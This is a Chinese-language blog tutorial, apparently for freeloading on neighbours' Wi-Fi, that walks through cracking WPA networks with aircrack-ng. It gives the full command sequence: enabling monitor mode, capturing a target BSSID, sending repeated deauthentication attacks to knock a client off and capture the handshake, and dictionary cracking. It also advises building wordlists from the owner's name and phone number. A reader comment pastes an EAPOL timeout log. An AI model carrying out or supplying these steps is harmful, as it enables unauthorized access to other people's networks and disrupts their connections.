在网速极其重要的今天能够随时随地连上wifi是多么的重要,但我看到看见附近的无线wifi这么多,不蹭不开心。
当然现在已经有一些高度集成的wifi破解工具,不过今天介绍的这款工具还是要做不少工作。废话不多直接上教程。
1、确认你的无线网卡支持
具体的可以参考aricrack兼容性,这里我就不多说了。
2、下载aircrack并安装
官网上可以直接找到win版和linux版的程序。我用的是linux的,用win的可以参考其他教程,不过想来也是差不多的。本人安装kali自带,也没有手动安装,就不献丑了。
3、开始教程
1、关闭网络
service network-manager stop
2、结束可能会影响结果的进程
airmon-ng check kill
3、查看网卡列表
iwconfig
s3.png
4、启动网卡到监听模式
选择适合你的无线网卡,wlan0请随着本地iwconfig显示的信息更改。
airmon-ng start wlan0
s4.png
5、监听周围所有无线网络信息
prism0跟随本地的信息更改,如上图。
airodump-ng prism0
由于附近的wifi比较多,a切换显示界面。
s51.png
s52.png
6、监听感兴趣的无线网络
根据上一步的结果执行如下命令:
说明两点:一、-c 后面跟的是该行CH的值。 二、-w跟随的是保存的文件名,可以任意取。
airodump-ng --bssid 14:75:90:C0:5E:68 -c 6 -w tmp prism0
7、加快得到握手包
保持上一步中的窗口不关,新开一个窗口,执行如下命令:
这一条我一般是1-2分钟执行一次,执行20-30次还没有结果我就会放弃这个wifi,换一个破解(毕竟周围的网络比较多,破解几个就行了)。当然也没有明确的规定,执行的频率。
aireplay-ng -0 2 -a 14:75:90:C0:5E:68 -c CC:A2:23:A3:7D:4D prism0
一直等到6、的窗口有wpa握手包后才可将6、停止。
s7.png
8、关闭监听接口
airmon-ng stop prism0
9、启动网络
service network-manager start
10、破解密码
这个是一个靠运气和耐心的活儿。首先要有一个比较好的wifi字典,如果没有就去下载一个。或者你知道一些敏感的信息,比如wifi主人的名字、电话等等,就去下载一个密码生成器,搜索一下,有一大堆,我就不推荐了。
我得到的握手包是tmp.cap 密码字典是pass.txt:
aircrack tmp-01.cap -w pass.txt
10.png
我的笔记本跑了一夜没跑出来……心里苦。
换一个wifi从头开始。
网友评论
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
出现这一种情况是怎么回事